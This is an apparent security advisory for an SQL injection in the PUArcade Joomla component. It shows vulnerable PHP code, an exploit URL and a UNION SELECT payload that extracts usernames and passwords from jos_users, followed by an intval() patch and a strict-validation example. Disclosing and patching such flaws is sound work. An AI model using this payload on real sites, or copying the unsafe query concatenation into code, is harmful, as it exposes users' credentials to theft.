Pu Arcade component for Joomla - SQL injection

2008.04.11
Credit: MantiS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

I discovered a vulnerability in Component PUARCADE for Joomla (the last version is vulnerable).

SQL Injection vulnerability in puarcade.class.php <= V. 2.2, component for Joomla.

Author: MantiS

Vulnerable code:
------------------------

function warningByGame($gid) {
    global $database;
    $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
        . " WHERE g.contentratingid = c.id"
        . " AND g.id = $gid";
    $database->setQuery($query);
    $cont = $database->loadObjectList();

--------------------------

Exploit:

http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]

Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns).

Patch:
--------

Place before "$query = "SELECT c.id......... " :

$gid = intval($_GET['gid']);

To force $gid variable conversion to an integer.
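The following is an added example, not part of the advisory or of the PUArcade code: it compares the intval() cast from the patch with a strict integer check applied to the value passed into the function rather than re-read from $_GET. intval() silently coerces malformed input (the quoted UNION string becomes 0, "7abc" becomes 7), while the strict check rejects it so the request can be refused and logged. The helper names parseGameId and buildWarningQuery and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example; helper names are hypothetical, not PUArcade or Joomla API.

/**
 * Strictly validate a game id: accept only a decimal integer >= 1.
 * Returns the integer, or null when the input is anything else.
 */
function parseGameId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Build the advisory's query from an already validated integer id. */
function buildWarningQuery(int $gid): string
{
    return "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename"
         . " FROM #__puarcade_games AS g, #__puarcade_contentrating AS c"
         . " WHERE g.contentratingid = c.id"
         . " AND g.id = " . $gid;   // int type guarantees digits only
}

// Constructed sample inputs; the third is the string quoted in the advisory,
// the fourth models a request sent as gid[]=7.
$samples = [
    '7',
    '7abc',
    '0 UNION SELECT password,username,0,0,0 from jos_users--',
    ['7'],
];

foreach ($samples as $raw) {
    $coerced = intval($raw);       // the advisory's patch: coerces silently
    $strict  = parseGameId($raw);  // strict check: null means "reject"

    printf("input=%s intval=%d strict=%s\n",
        json_encode($raw), $coerced, $strict === null ? 'rejected' : (string) $strict);

    if ($strict === null) {
        // Refuse the request instead of querying with a coerced value.
        error_log('puarcade: rejected non-integer gid ' . json_encode($raw));
        continue;
    }
    echo '  query: ', buildWarningQuery($strict), "\n";
}
```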



Copyright 2024, cxsecurity.com

 
